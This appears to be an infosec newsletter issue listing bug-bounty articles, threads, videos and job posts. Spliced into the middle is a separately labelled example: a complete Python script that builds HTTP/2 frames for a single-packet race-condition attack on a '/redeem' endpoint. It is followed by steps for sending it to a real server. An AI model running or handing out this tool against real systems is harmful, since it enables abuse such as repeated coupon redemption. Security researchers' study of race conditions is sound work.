👩‍💻IW Weekly #122: SSRF, Password Reset Vulnerability, XSS in Hotjar, Single-Packet Attack, WhatsApp Desktop Code Execution, Business Logic Errors and many more…

Welcome to the #IWWeekly122 - the Monday newsletter that brings the best in Infosec straight to your inbox.

To help you out, we have 5 Articles, 4 Threads, 3 Videos, 2 Job Alerts and a Special Item 🫢

Read, upskill yourself and spread love to the community 💝

Excited? Let’s jump in 👇

📝 5 Infosec Articles

  1. Gain insight into how @saugatpk5 was able to steal a Facebook auth token and earned multiple bounties from the Meta bug bounty program.
  2. The team at @SaltSecurity highlights an XSS vulnerability in Hotjar that exposed a million websites to information-disclosure risk.
  3. @Jerry1319 discusses how he chained a business-logic error into a pre-account takeover on a Google VRP target.
  4. @googlechrome asks users to switch to another ad blocker, as it plans to disable uBlock Origin soon.
  5. The team at @flatt_sec_en explores the single-packet attack, a technique for exploiting web race conditions that completes many HTTP/2 requests in a single TCP packet, so that network jitter no longer spreads their arrival times.
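To make the single-packet idea concrete, here is an added example (not code from the Flatt Security post or from any tool it describes) that builds the two send stages of the attack as raw HTTP/2 frames. It assumes a hypothetical target host, path and body, and a typical TCP MSS of 1460 bytes; header fields are encoded as HPACK literals without indexing so no external library is needed. The point it demonstrates is why the attack beats jitter: every request is sent except its final byte, and the 20 one-byte END_STREAM frames that complete them total only 200 bytes, small enough to leave the client in one TCP segment.

```python
"""Two-stage framing of an HTTP/2 single-packet race attack (added example).

Assumptions: target authority/path/body are constructed placeholders, and
TYPICAL_MSS is a typical Ethernet TCP payload size, not measured from a target.
Frame layout follows RFC 9113 (HTTP/2); header encoding follows RFC 7541 (HPACK).
"""
import struct

PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"     # client connection preface
TYPE_DATA, TYPE_HEADERS, TYPE_SETTINGS = 0x0, 0x1, 0x4
FLAG_END_STREAM, FLAG_END_HEADERS = 0x1, 0x4
TYPICAL_MSS = 1460                                  # assumption: one Ethernet-sized segment


def frame(ftype, flags, stream_id, payload=b""):
    """One HTTP/2 frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id, payload."""
    assert len(payload) < 2 ** 24 and 0 <= stream_id < 2 ** 31
    header = struct.pack(">I", len(payload))[1:] + bytes([ftype, flags]) + struct.pack(">I", stream_id)
    return header + payload


def parse_frames(buf):
    """Split a byte string back into (type, flags, stream_id, payload) tuples."""
    frames = []
    while buf:
        length = int.from_bytes(buf[:3], "big")
        ftype, flags = buf[3], buf[4]
        stream_id = struct.unpack(">I", buf[5:9])[0] & 0x7FFFFFFF  # drop reserved bit
        frames.append((ftype, flags, stream_id, buf[9:9 + length]))
        buf = buf[9 + length:]
    return frames


def hpack_literal(name, value):
    """HPACK 'literal header field without indexing, new name': 0x00, then two
    non-Huffman string literals (H bit 0, 7-bit length; lengths < 127 only)."""
    assert len(name) < 127 and len(value) < 127
    return b"\x00" + bytes([len(name)]) + name + bytes([len(value)]) + value


def request_headers(authority, path, body_len):
    """HEADERS payload for a POST; pseudo-headers must precede regular ones."""
    fields = [
        (b":method", b"POST"), (b":scheme", b"https"),
        (b":authority", authority), (b":path", path),
        (b"content-type", b"application/x-www-form-urlencoded"),
        (b"content-length", str(body_len).encode()),
    ]
    return b"".join(hpack_literal(n, v) for n, v in fields)


def build_stages(n_requests, authority, path, body):
    """Return (warm_up, final_packet).

    warm_up: preface, an empty SETTINGS frame, and for every stream its HEADERS
    frame plus all of the body except the last byte, with END_STREAM set nowhere,
    so the server has buffered each request but cannot start processing it.
    final_packet: one 1-byte DATA frame with END_STREAM per stream; written to the
    socket in a single send, all n requests complete in one TCP segment.
    """
    assert len(body) >= 1
    warm_up = PREFACE + frame(TYPE_SETTINGS, 0, 0)
    final = b""
    for i in range(n_requests):
        sid = 2 * i + 1  # client-initiated streams use odd ids
        warm_up += frame(TYPE_HEADERS, FLAG_END_HEADERS, sid, request_headers(authority, path, len(body)))
        warm_up += frame(TYPE_DATA, 0, sid, body[:-1])
        final += frame(TYPE_DATA, FLAG_END_STREAM, sid, body[-1:])
    return warm_up, final


def fits_one_packet(final_packet, mss=TYPICAL_MSS):
    """True when the completing frames fit in a single TCP segment."""
    return len(final_packet) <= mss


if __name__ == "__main__":
    warm, final = build_stages(20, b"target.example", b"/redeem", b"code=ABC123")
    print(len(warm), "warm-up bytes;", len(final), "bytes to finish all 20 requests;",
          "fits one packet:", fits_one_packet(final))
```

To use this against a real server you would open a TLS socket negotiating `h2` via ALPN, set `TCP_NODELAY` so the kernel does not hold the final write, send `warm_up`, pause briefly, then send `final_packet` with a single `sendall`. Whether all requests land in the same server-side race window also depends on the server's `SETTINGS_MAX_CONCURRENT_STREAMS` and flow-control window being large enough for the batch, which this example does not check.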

🧵 4 Threads

  1. Read how to stay motivated while bug bounty hunting in this excellent thread by @ctbbpodcast featuring @SinSinology.
  2. @harshbothra_ talks about their new initiative, "Rakshak". Kudos!
  3. Check out this thread by @intigriti on finding your first SSRF vulnerability, or escalating an SSRF you already have into something much bigger.
  4. @mcipekci shares a fantastic tale of how they were able to reset any user's password in a recent pentest engagement.

📽️ 3 Insightful Videos

  1. @NahamSec ran nuclei across all of their bug bounty programs and made a video on the results. Do check it out.
  2. Join @ctbbpodcast in Episode 81 with @MtnBer as they dive into client-side hacking and DevTools tips for bug bounty hunters!
  3. @_johnhammond shows how arbitrary Python code can be run through the WhatsApp desktop application, and the security issues that come with it.

💼 2 Job Alerts

  1. Join Redfox Security as a Red Teamer to unleash your creativity and technical skills in pioneering cyber security solutions. 
  2. Michelin is hiring a Security Analyst in Pune to strengthen the security of their diverse mobility solutions and services.

🎁 1 Special Item

  1. This week’s highlight: @Bugcrowd’s new tool, HUNT, offers a fantastic open-source contribution opportunity, featuring a collection of extensions for @Burp_Suite and @zaproxy.

That’s all for this week. We hope you enjoyed these finds and learned something new from today’s newsletter. See you again next week, hacker; until then, keep pushing 💪

This newsletter would not have been possible without our amazing ambassadors.

Resource contribution by: Nikhil A Memane, Hardik Singh, Bhavesh Harmalkar, Manan, Shlok, Rachit Arora, Siddhesh Prakash Patil
Newsletter formatting by: Bhavesh Harmalkar, Nithin R, Manan, Shlok, Vivek Reddy, Siddhesh Prakash Patil

Lots of love
Editorial team,

Infosec Writeups

📧
If you have questions, comments, or feedback reach out to us on Twitter @InfoSecComm or email [email protected]
